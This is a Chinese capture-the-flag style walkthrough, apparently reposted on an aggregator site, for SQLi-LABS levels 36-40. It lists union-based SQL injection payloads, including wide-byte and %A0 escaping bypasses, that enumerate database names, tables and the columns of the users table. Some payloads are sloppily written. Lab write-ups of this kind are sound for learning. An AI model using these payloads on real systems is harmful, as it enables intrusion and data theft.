SQLi-LABS靶场36-40通过攻略

SQLi-LABS靶场36-40通过攻略

news2025/11/6 6:20:12

less-36

这一关是转义函数换成了mysql_real_escape_string,绕过方法与35关一致

1.判断注入点

2.判断闭合方式

id=1'A0 --+

3.查看页面回显点

?id=-1%A0%27%20%20union%20select%201,2,3--+

4.查询数据库名

?id=-1%A0%27%20%20union%20select%201,database(),3--+

5.查询数据库的所有表

?id=-1%A0%27%20%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3--+

6.查询users表的所有字段

?id=-1%A0%27%20%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273),3--+

less-37

可以看到是一个post表单

1.使用burp进行抓包

2.判断注入点

在uname后进行宽字节注入发现会出现报错

3.查看页面回显点

uname=?id=-1%df' union select 1,2 --+

4.查询数据库名

uname=uname=?id=-1%df' union select 1,database() --+

5.查询数据库的所有表

uname=?id=-1%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

6.查询users表的所有字段

uname=?id=-1%A0%27%20%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273)--+

less-38

这一关是堆叠注入

1.判断注入点

当?id=1'时页面会出现报错

2.判断闭合方式

?id=1' --+ 可以闭合成功

3.查看页面回显点

?id=-1' union select 1,2,3--+

4.查询数据库名

?id=-1' union select 1,database(),3--+

5.查询数据库的所有表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

6.查询users表的所有数据

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

less-39

1.判断注入点

当?id=1'时页面会出现报错

2.判断闭合方式

?id=1' --+ 发现单引号无法闭合可能是整数型

?id=1 --+可以闭合成功说明这个是整数型

3.查看页面回显点

?id=-1 union select 1,2,3--+

4.查询数据库名

?id=-1 union select 1,database(),3--+

5.查询数据库的所有表

?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

6.查询users表的所有字段

?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

less-40

1.判断注入点

正常页面

错误页面

2.判断闭合方式

当?id=1') --+时可以闭合成功

3.查看页面回显点

?id=-1') union select 1,2,3 --+

4.查询数据库名

?id=-1') union select 1,database(),3 --+

5.查询数据库的所有表

?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

6.查询users表的所有字段

?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),3 --+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2081983.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

Qt20窗口相关位置函数

Qt20窗口相关位置函数

窗口相关位置函数知识点geometry.hgeometry.cppmain.cpp运行图知识点 geometry().x() 多屏幕实现方法 #include <QWidget> #include <QPoint> #include <QScreen> // 假设这个函数是某个QWidget的子类中的成员函数 void MyWidget::showGlobalXPos…

阅读更多...

【生日视频制作】美女车模特举牌AE模板修改文字软件生成器教程特效素材【AE模板】

【生日视频制作】美女车模特举牌AE模板修改文字软件生成器教程特效素材【AE模板】

生日视频制作教程美女车模特举牌AE模板改字广软件告生成器素材怎么如何做的【生日视频制作】美女车模特举牌AE模板修改文字软件生成器教程特效素材【AE模板】生日视频制作步骤： 安装AE软件下载AE模板把AE模板导入AE软件修改图片或文字渲染出视频

阅读更多...

C# for语句

C# for语句

计数循环使用for语句比while语句可读性高 for (int i 0; i < 10; i) { Console.WriteLine("hello"); } 先执行int i0；语句，且只执行一次判断循环条件 i<10; 语句的结果是否为true，如果为true，先执行循环体…

阅读更多...

【MySQL】mysql索引和事务(面试经典问题)

【MySQL】mysql索引和事务(面试经典问题)

欢迎关注个人主页：逸狼创造不易，可以点点赞吗~ 如有错误，欢迎指出~ 目录 mysql索引代价查看索引创建索引删除索引索引背后的数据结构 B树 B树 B树与B树的区别 B树的优势 mysql事务事务涉及的四个核心特性: 隔离性详细解释脏读不可重…

阅读更多...

阿里巴巴1688 阿里228滑块网站分析

阿里巴巴1688 阿里228滑块网站分析

声明: 本文章中所有内容仅供学习交流使用，不用于其他任何目的，抓包内容、敏感网址、数据接口等均已做脱敏处理，严禁用于商业用途和非法用途，否则由此产生的一切后果均与作者无关！ 有相关问题请第一时间头像私信联系我…

阅读更多...

前端接口请求与后端交互详解联调后端取不到值自己的一点记录写的比较随意会比较乱但都是干货

前端接口请求与后端交互详解联调后端取不到值自己的一点记录写的比较随意会比较乱但都是干货

响应头： cache-control: 缓存控制联调后端取不到值？？ 无论何种形式传递，后端解析表单信息的时候，会考虑Content-Type。如果是JSON字符串的话，后端解析payload的内容时候要去解析JSON。如果是key1val…

阅读更多...

国科大矩阵论2023秋季叶世伟老师考试试卷

国科大矩阵论2023秋季叶世伟老师考试试卷

叶老师的考试很难，图源一位胆大的勇者~ 希望能帮助大家！

阅读更多...

如何使用poutine检测代码库构建管道中的安全缺陷

如何使用poutine检测代码库构建管道中的安全缺陷

关于poutine poutine是一款功能强大的缺陷检测工具，该工具基于Go语言开发，可以帮助广大研究人员快速扫描和检测代码存储库构建管道中的错误配置和安全漏洞。该工具支持解析来自 GitHub Actions 和 Gitlab CI/CD 的 CI 工作流。当获得具有读取级别访问权…

阅读更多...

MySQL：简述事务的SQL操作

MySQL：简述事务的SQL操作

1、查询数据库的隔离级别选择数据库,查看当前事务隔离界别。 （1）读未提交：READ-UNCOMMITTED （2）读已提交：READ-COMMITTED （3）可重复读：REPEATABLE-READ （4&…

阅读更多...

qt报错 error: undefined reference to `vtable for RelayDevice 解决方法

qt报错 error: undefined reference to `vtable for RelayDevice 解决方法

在 Qt 编程中，当出现错误 undefined reference to ‘vtable for RelayDevice’ 时，通常是因为类的虚函数没有实现，或者未正确实现虚析构函数。以下是一些可能的解决方法： 确保实现所有虚函数： 检查 RelayDevice 类中声…

阅读更多...

大白话-【2.1】WindowsServer2016配置DHCP

大白话-【2.1】WindowsServer2016配置DHCP

1.DHCP服务功能介绍 2.DHCP服务安装 3.DHCP服务配置 3.VMWare实操 3.1VMWare用的是vmnet8网段DHCP服务 3.2关闭VMWare提供的DHCP服务扩展：清除DNS缓存命令 ipconfig/flushdns END 提升给客户机固定IP 1.查询网卡MAC

阅读更多...

漏洞披露-金慧-综合管理信息系统-SQL

漏洞披露-金慧-综合管理信息系统-SQL

本文来自无问社区，更多漏洞信息可前往查看http://wwlib.cn/index.php/artread/artid/6607.html 本文仅用于技术研究学习，请遵守相关法律，禁止使用本文所提及的相关技术开展非法攻击行为，由于传播、利用本文所提供的信息而造成任何…

阅读更多...

10天速通Tkinter库——Day8：《植物杂交实验室》杂交实验及历史记录界面

10天速通Tkinter库——Day8：《植物杂交实验室》杂交实验及历史记录界面

本篇博客我将介绍Tkinter实践项目《植物杂交实验室》中的杂交实验、实验结果和历史记录两个页面的制作。它们作为主窗口的子页面实例，除了继承主窗口的基础设置（如图标、标题、尺寸等等）、还可以使用主窗口的属性和方法（如数据变…

阅读更多...

IoTDB 如何有效实现磁盘 I/O 监控和优化？

IoTDB 如何有效实现磁盘 I/O 监控和优化？

IoTDB 监控工具：有效保障读写数据量与系统效率！ 磁盘 I/O 负载过高的原因是什么？如何排查？ 如何判断磁盘 I/O 是否成为系统瓶颈？ 如何优化磁盘 I/O 读写性能？ 在现代计算机系统和应用程序中，磁盘…

阅读更多...

[000-002-01].第26节：MySQL对隔离级别的实现

[000-002-01].第26节：MySQL对隔离级别的实现

1.MySQL支持的四种隔离级别： 2.如何设置事务的隔离级别 3.不同隔离级别举例 3.1.演示1. 读未提交之脏读 3.2.演示2：读已提交 3.3.演示3：设置隔离级别为可重复读，事务的执行流程如下： 3.4.演示4：幻读:

阅读更多...

3 Python开发工具：VSCode+插件

3 Python开发工具：VSCode+插件

本文是 Python 系列教程第 3 篇，完整系列请查看 Python 专栏。 Visual Studio Code的安装非常简单，就不放这里增加文章篇幅了。相比PyCharm，VSCode更加轻量，启动速度快。并且搭配Python插件就能实现和Pycharm一样的代码提示、高…

阅读更多...

在手机在线预览3D模型，是如何实现的？

在手机在线预览3D模型，是如何实现的？

在手机在线预览3D模型，主要依赖于几个关键技术和步骤来实现。以下是一个概括性的流程： 一、模型上传选择平台：首先，用户需要选择一个支持3D模型在线预览的平台，如51建模网、Sketchfab等。这些平台通常提供用户友好的…

阅读更多...

iPhone不停重启怎么办？全面解析与解决方案

iPhone不停重启怎么办？全面解析与解决方案

iPhone作为当今最受欢迎的智能手机之一，其稳定性和流畅性一直备受用户赞誉。然而，有时我们可能会遇到iPhone不停重启的问题，这不仅影响了正常使用，还可能让我们感到焦虑和困扰。本文将为大家详细解析iPhone不停重启的原因&#xf…

阅读更多...

常用的编写VBA的软件 (L*00K)

常用的编写VBA的软件 (L*00K)

一、Microsoft Office套件 Microsoft Excel： Excel是VBA编程最为广泛使用的环境之一。用户可以通过编写宏来自动化重复性的任务，如数据整理、自动填充、复杂的计算等。Excel中的VBA功能让用户能够创建复杂的函数、表单以及完整的应用程序，以…

阅读更多...

html+css网页设计个人网站模版我的书屋5个页面

html+css网页设计个人网站模版我的书屋5个页面

htmlcss网页设计个人网站模版我的书屋5个页面网页作品代码简单，可使用任意HTML编辑软件（如：Dreamweaver、HBuilder、Vscode 、Sublime 、Webstorm、Text 、Notepad 等任意html编辑软件进行运行及修改编辑等操作）。获取源码 …

阅读更多...

推荐文章

最新文章